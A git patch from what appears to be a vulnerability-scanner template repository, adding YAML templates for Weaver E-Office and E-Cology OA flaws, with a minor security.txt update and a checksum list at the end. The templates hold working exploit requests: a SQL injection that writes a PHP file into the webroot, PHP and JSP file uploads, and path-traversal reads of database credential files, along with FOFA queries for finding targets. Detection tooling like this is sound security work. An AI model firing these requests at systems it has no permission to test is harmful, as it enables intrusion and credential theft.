max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-office,oa,sqli + +variables: + filename: "{{to_lower(rand_base(5))}}" + payload: "[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']" + +http: + - raw: + - | + GET /inc/group_user_list/group_xml.php?par={{base64(payload)}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + GET /{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "PHP Version" + - "PHP Extension" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml similarity index 56% rename from http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml rename to http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml index 2adf272444..901bd23ef0 100755 --- a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml +++ b/http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml @@ -1,22 +1,26 @@ -id: weaver-e-office-uploadify-arbitrary-file-upload3 +id: weaver-jquery-file-upload info: - name: weaver-e-office-uploadify-arbitrary-file-upload3 + name: OA E-Office jQuery - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 泛微OA E-Office uploadify.php 任意文件上传漏洞 reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py - tags: weaver,e-office,oa + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-office,oa,instrusive,rce + +variables: + filename: "{{to_lower(rand_base(5))}}" + string: "{{randstr}}" http: - raw: - | GET /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - | POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 @@ -27,19 +31,15 @@ http: Accept-Encoding: gzip ------WebKitFormBoundaryjetvpuye - Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php" + Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Type: application/octet-stream - <?php echo "{{randstr_2}}";unlink(__FILE__);?> + <?php echo "{{string}}";unlink(__FILE__);?> ------WebKitFormBoundaryjetvpuye-- - | - GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1 + GET /attachment/{{attachmentID}}/{{filename}}.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - extractors: - type: regex @@ -48,12 +48,10 @@ http: regex: - "[0-9]{10}" - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - - "status_code_2 == 200" - - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + - "status_code_3 == 200 && contains(body_3,'{{string}}')" condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml similarity index 63% rename from http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml rename to http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml index 7bdf5c9c6d..46aea1864c 100755 --- a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml @@ -1,22 +1,26 @@ -id: weaver-e-office-uploadify-arbitrary-file-upload +id: weaver-lazyuploadify-file-upload info: - name: weaver-e-office-uploadify-arbitrary-file-upload + name: OA E-Office LazyUploadify - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 泛微OA E-Office uploadify.php 任意文件上传漏洞 reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py - tags: weaver,e-office,oa + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-office,oa,instrusive,rce + +variables: + filename: "{{to_lower(rand_base(5))}}" + string: "{{randstr}}" http: - raw: - | GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - | POST /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1 @@ -27,19 +31,15 @@ http: Accept-Encoding: gzip ------WebKitFormBoundaryjetvpuye - Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php" + Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Type: application/octet-stream - <?php echo "{{randstr_2}}";unlink(__FILE__);?> + <?php echo "{{string}}";unlink(__FILE__);?> ------WebKitFormBoundaryjetvpuye-- - | GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - extractors: - type: regex @@ -48,6 +48,7 @@ http: group: 1 regex: - "attachmentID\":(.*?)," + - type: regex name: attachmentName internal: true @@ -55,12 +56,11 @@ http: regex: - "attachmentName\":\"(.*?)\"," - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - - "contains(body_2, 'attachmentID') && status_code_2 == 200" - - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + - "contains(body_2, 'attachmentID') && contains(body_2, 'attachmentName')" + - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml similarity index 56% rename from http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml rename to http/vulnerabilities/weaver/weaver-login-sessionkey.yaml index 87f2a19785..965c468ad5 100644 --- a/http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml +++ b/http/vulnerabilities/weaver/weaver-login-sessionkey.yaml @@ -1,30 +1,26 @@ -id: weaver-e-office-login-quick-seesionkey +id: weaver-login-sessionkey info: - name: weaver-e-office-login-quick-seesionkey - author: zimuzhi + name: OA E-Mobile login_quick.php - Login SessionKey + author: SleepingBag945 severity: high - description: 泛微OA E-Office login_quick.php 获取登录seesionnkey - tags: weaver,e-office,oa + metadata: + max-request: 1 + shodan-query: http.html:"E-Mobile" + tags: weaver,e-mobile,oa http: - raw: - | POST /E-mobile/App/System/Login/login_quick.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip identifier=admin - | GET /E-mobile/App/Init.php?m=all_Create&detailid=&fromid=&sessionkey={{timestamp}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip extractors: - type: regex @@ -34,7 +30,6 @@ http: regex: - '\"sessionkey\":\"(.*?)\"' - req-condition: true matchers-condition: and matchers: - type: dsl diff --git a/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml new file mode 100644 index 0000000000..e712f08cd0 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml @@ -0,0 +1,28 @@ +id: weaver-mysql-config-info-leak + +info: + name: OA E-Office mysql_config.ini - Database Information Leakage + author: SleepingBag945 + severity: high + description: | + E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/mysql_config.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/plain")' + - 'contains(body,"datapassword") && contains(body, "datauser")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml new file mode 100755 index 0000000000..a9090fb0cf --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml @@ -0,0 +1,59 @@ +id: weaver-office-server-file-upload + +info: + name: OA E-Office OfficeServer.php Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + OA E-Office OfficeServer.php has an arbitrary file upload vulnerability. Attackers can obtain sensitive information on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20OfficeServer.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-office,oa,rce,intrusive,file-upload + +variables: + filename: "{{to_lower(rand_base(5))}}" + +http: + - raw: + - | + POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew + + ------WebKitFormBoundaryLpoiBFy4ANA8daew + Content-Disposition: form-data;name="FileData";filename="{{filename}}.php" + Content-Type: application/octet-stream + + <?php + phpinfo(); + ?> + + ------WebKitFormBoundaryLpoiBFy4ANA8daew + Content-Disposition: form-data;name="FormData" + + {'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{filename}}.php'} + ------WebKitFormBoundaryLpoiBFy4ANA8daew-- + + - | + GET /eoffice10/server/public/iWebOffice2015/Document/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "PHP Version" + - "PHP Extension" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml new file mode 100755 index 0000000000..c3017184b9 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml @@ -0,0 +1,33 @@ +id: weaver-officeserver-lfi + +info: + name: OA E-Office officeserver.php Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-cology,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "datapassword" + - "datauser" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml new file mode 100755 index 0000000000..addbc4cf7e --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml @@ -0,0 +1,40 @@ +id: weaver-signaturedownload-lfi + +info: + name: OA E-Weaver SignatureDownLoad - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="泛微-E-Weaver" + verified: true + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DriverClasses" + - "ecology.password" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + - "markPicture.jpg" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml new file mode 100755 index 0000000000..c00ef47348 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml @@ -0,0 +1,39 @@ +id: weaver-sptmforportalthumbnail-lfi + +info: + name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading. + reference: + - http://124.223.89.192/archives/e-cology8-14 + - https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml + metadata: + max-request: 1 + fofa-query: app="泛微-E-Weaver" + verified: true + tags: weaver,e-cology,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "weaver.general.BaseBean" + - "getServletConfig" + condition: and + + - type: word + part: header + words: + - "image/png" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml similarity index 56% rename from http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml rename to http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index 5cd4ecbf7e..b34c91983f 100755 --- a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -1,22 +1,26 @@ -id: weaver-e-office-uploadify-arbitrary-file-upload2 +id: weaver-uploadify-file-upload info: - name: weaver-e-office-uploadify-arbitrary-file-upload2 + name: OA E-Office Uploadify - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 泛微OA E-Office uploadify.php 任意文件上传漏洞 reference: - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py - tags: weaver,e-office,oa + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-office,oa,instrusive,rce + +variables: + filename: "{{to_lower(rand_base(5))}}" + string: "{{randstr}}" http: - raw: - | GET /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - | POST /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1 @@ -27,27 +31,21 @@ http: Accept-Encoding: gzip ------WebKitFormBoundaryjetvpuye - Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php" + Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.php" Content-Type: application/octet-stream - <?php echo "{{randstr_2}}";unlink(__FILE__);?> + <?php echo "{{randstr}}";unlink(__FILE__);?> ------WebKitFormBoundaryjetvpuye-- - | GET /attachment/personal/_temp.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" - - "contains(body_2, 'imageSrc') && status_code_2 == 200" - - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + - "contains(body_2, 'imageSrc') && contains(body_2, 'height')" + - "status_code_3 == 200 && contains(body_3,'{{randstr}}')" condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml similarity index 65% rename from http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml rename to http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml index ef9b4eb02f..51647b3a29 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml @@ -1,20 +1,22 @@ -id: weaver-e-cology-uploadoperation-arbitrary-file-upload +id: weaver-uploadoperation-file-upload info: - name: weaver e-cology uploadoperation.jsp arbitrary file upload + name: Weaver OA Workrelate - Arbitary File Upload author: SleepingBag945 severity: critical - description: Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + description: | + Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cwe-id: CWE-434 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml metadata: fofa-query: app="泛微-协同办公OA" tags: ecology,upload,fileupload,intrusive +variables: + filename: "{{to_lower(rand_base(5))}}" + string: "{{randstr}}" + http: - raw: - | @@ -30,9 +32,9 @@ http: 1 ------WebKitFormBoundaryVdb2RRl25PuaGhWj - Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.jsp" + Content-Disposition: form-data; name="Filedata"; filename="{{filename}}.jsp" - <%out.println("{{randstr_2}}");%> + <%out.println("{{string}}");%> ------WebKitFormBoundaryVdb2RRl25PuaGhWj Content-Disposition: form-data; name="plandetailid" @@ -54,11 +56,8 @@ http: ------WebKitFormBoundaryVdb2RRl25PuaGhWj-- - | - GET /{{randstr_1}}.jsp HTTP/1.1 + GET /{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip extractors: - type: regex @@ -68,14 +67,11 @@ http: regex: - "&fileid=(.*?)\'>" - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')" - - "contains(body_2, 'println') && status_code_2 == 200" - - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + - "status_code_2 == 200 && contains(body_2, 'println')" + - "status_code_3 == 200 && contains(body_3,'{{string}}')" condition: and - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml similarity index 53% rename from http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml rename to http/vulnerabilities/weaver/weaver-userselect-unauth.yaml index d037cb7226..e4e1463ec3 100755 --- a/http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml +++ b/http/vulnerabilities/weaver/weaver-userselect-unauth.yaml @@ -1,31 +1,33 @@ -id: weaver-oa-e-office-userselect-unauth +id: weaver-userselect-unauth info: - name: weaver-oa e-office userselect unauth + name: OA E-Office UserSelect Unauthorized Access author: SleepingBag945 severity: high - description: 泛微OA E-Office UserSelect 未授权访问漏洞,泛微OA E-Office UserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息 + description: | + OA E-Office UserSelect interface has an unauthorized access vulnerability, through which attackers can obtain sensitive information reference: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html - tags: weaver,e-office,oa,sqli + metadata: + max-request: 1 + fofa-query: app="泛微-EOffice" + verified: true + tags: weaver,e-office,oa,unauth http: - - raw: - - | - GET /UserSelect/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - + - method: GET + path: + - "{{BaseURL}}/UserSelect/" matchers-condition: and matchers: - type: word words: - "<title>选择人员" - - type: word - words: - "/UserSelect/dept.php" + condition: and + - type: status status: - 200 From d0b1e251e2713ee3e82ce01692b2214eca892bbf Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 13 Sep 2023 13:24:26 +0200 Subject: [PATCH 0339/1090] Update security-txt.yaml (#8185) --- http/miscellaneous/security-txt.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/http/miscellaneous/security-txt.yaml b/http/miscellaneous/security-txt.yaml index 01567d9231..e5ee4e3a32 100644 --- a/http/miscellaneous/security-txt.yaml +++ b/http/miscellaneous/security-txt.yaml @@ -1,13 +1,17 @@ id: security-txt info: - name: Security.txt File - author: bad5ect0r + name: security.txt File + author: bad5ect0r,noraj severity: info - description: The website defines a security policy. - tags: misc,generic + description: File similar to robots.txt but intended to be read by humans wishing to contact a website’s owner about security issues. Often defines a security policy and contact details. + reference: + - https://securitytxt.org/ + - https://community.turgensec.com/security-txt-progress-in-ethical-security-research/ metadata: max-request: 2 + shodan-query: http.securitytxt:contact http.status:200 + tags: misc,generic http: - method: GET @@ -36,4 +40,4 @@ http: - type: regex group: 1 regex: - - '(?mi)Contact:(.*)' \ No newline at end of file + - '(?mi)Contact:(.*)' From a1fdc7e3c2fb844858634857700739ebea9cd86f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 13 Sep 2023 11:24:59 +0000 Subject: [PATCH 0341/1090] Auto Generated Templates Checksum [Wed Sep 13 11:24:59 UTC 2023] :robot: --- templates-checksum.txt | 408 ++++++++++++++++++++--------------------- 1 file changed, 204 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 575e98e7d5..1bf2c13222 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:46e94935eba8934af2bfd77e17dd4bb352a4ec0d TEMPLATES-STATS.md:3f74e66db0aeaf37e1b9d401f4d8fc23bc8a059f TOP-10.md:d9e01f12d3aad16e5a340a0d8d59a87dc902e62c contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:6e83667e7f33958621824fed4245a351acee3203 -cves.json-checksum.txt:3e7561a12ee2184a64d881a91e020ed3fc7eda00 +cves.json:1673d2dc4076e6abda6a30f91903556b49de4cd3 +cves.json-checksum.txt:2476f1d6388064dcabe111a582494ebf8e0b2a30 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -4266,7 +4266,7 @@ http/miscellaneous/options-method.yaml:99929d85d875946d3debe94d08fcaeb41548d629 http/miscellaneous/rdap-whois.yaml:8f6fd0e2c818826c694da87377499fa47bfea6b1 http/miscellaneous/robots-txt-endpoint.yaml:77a2aecea8dd753215ede1443d94a11144636610 http/miscellaneous/robots-txt.yaml:43b0f22528ebff24084bee1b8542d3eaa45ee3e8 -http/miscellaneous/security-txt.yaml:01860642627f2d383a9326d0ee0f939a14595ee0 +http/miscellaneous/security-txt.yaml:4270d144c5ec8423a0dfef2a6a0399b6dfe0c0fe http/miscellaneous/sitemap-detect.yaml:896df94a32924657fe3dafc7dbe4ac63e7c7f7bb http/miscellaneous/spnego-detect.yaml:5fcee75ce616df46522aea4c93dbc0fa8ff2d13d http/miscellaneous/x-recruiting-header.yaml:be807ca580ac0c82dad3ef51b41dc407d9f745e6 @@ -5818,218 +5818,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c 